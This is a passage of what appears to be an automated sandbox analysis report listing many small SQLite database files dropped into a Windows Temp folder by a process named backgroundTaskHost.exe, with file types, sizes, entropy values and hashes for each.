                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\p1zSXLN1Kh

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\p2C3Db9PAh

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\p2FdvOicRw

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\p9qc6eX7Hw

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\pRExl846GV

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\pb3UwS1a6f

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\qD20EJPESx

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\qTjxPmB8Rm

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\qsPfLIeTSN

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\rCQJcQwGec

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\rbXIuLAczm

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\reo8v7dacI

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\rwkdaHFuXQ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\s0ZhFZq0Hp

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\sKZG7HpWm6

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\soJsLkvfzQ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tbb7aibGJr

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tlySnGWbL0

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tpxu874eIQ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tz9Wo17lm1

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\u5X98JoqSg

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\u6IbdKfvON

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\uTOKg8Erfm

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
